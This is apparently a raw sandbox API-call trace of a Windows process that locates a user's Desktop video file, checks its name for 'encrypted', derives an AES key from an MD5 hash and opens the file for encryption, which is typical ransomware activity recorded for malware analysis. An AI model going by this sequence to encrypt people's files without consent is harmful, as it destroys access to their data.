[0029.671] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0029.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.671] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.671] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.671] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.671] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85b3c70, ftCreationTime.dwHighDateTime=0x1d5b960, ftLastAccessTime.dwLowDateTime=0x5e69cf20, ftLastAccessTime.dwHighDateTime=0x1d5c010, ftLastWriteTime.dwLowDateTime=0x5e69cf20, ftLastWriteTime.dwHighDateTime=0x1d5c010, nFileSizeHigh=0x0, nFileSizeLow=0xdc85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="aEGTPtS7bD.avi", cAlternateFileName="AEGTPT~1.AVI")) returned 0x7c20c0 [0029.671] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0029.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0029.672] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.672] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85b3c70, ftCreationTime.dwHighDateTime=0x1d5b960, ftLastAccessTime.dwLowDateTime=0x5e69cf20, ftLastAccessTime.dwHighDateTime=0x1d5c010, ftLastWriteTime.dwLowDateTime=0x5e69cf20, ftLastWriteTime.dwHighDateTime=0x1d5c010, nFileSizeHigh=0x0, nFileSizeLow=0xdc85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="aEGTPtS7bD.avi", cAlternateFileName="AEGTPT~1.AVI")) returned 0x7c20c0 [0029.672] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0029.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0029.672] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aEGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EGTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GTPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TPtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PtS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tS7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S7bD.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0029.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0029.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0029.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0029.674] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.674] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0029.674] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.674] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.674] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.674] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.674] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.674] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.674] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.674] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85b3c70, ftCreationTime.dwHighDateTime=0x1d5b960, ftLastAccessTime.dwLowDateTime=0x5e69cf20, ftLastAccessTime.dwHighDateTime=0x1d5c010, ftLastWriteTime.dwLowDateTime=0x5e69cf20, ftLastWriteTime.dwHighDateTime=0x1d5c010, nFileSizeHigh=0x0, nFileSizeLow=0xdc85, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="aEGTPtS7bD.avi", cAlternateFileName="AEGTPT~1.AVI")) returned 0x7c2100 [0029.674] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0029.674] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.674] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.674] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0029.674] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0029.675] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.675] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.675] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0029.675] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0029.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.676] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0029.676] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.676] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.676] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0029.676] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0029.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.676] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0029.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.676] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.676] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0029.676] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.676] CryptDestroyHash (hHash=0x7c2240) returned 1 [0029.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0029.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0029.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0029.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0029.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0029.677] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aEGTPtS7bD.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aegtpts7bd.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.677] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.677] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0029.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0029.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0029.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.677] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0029.677] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0029.677] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0029.678] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0029.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0029.678] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0029.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.679] 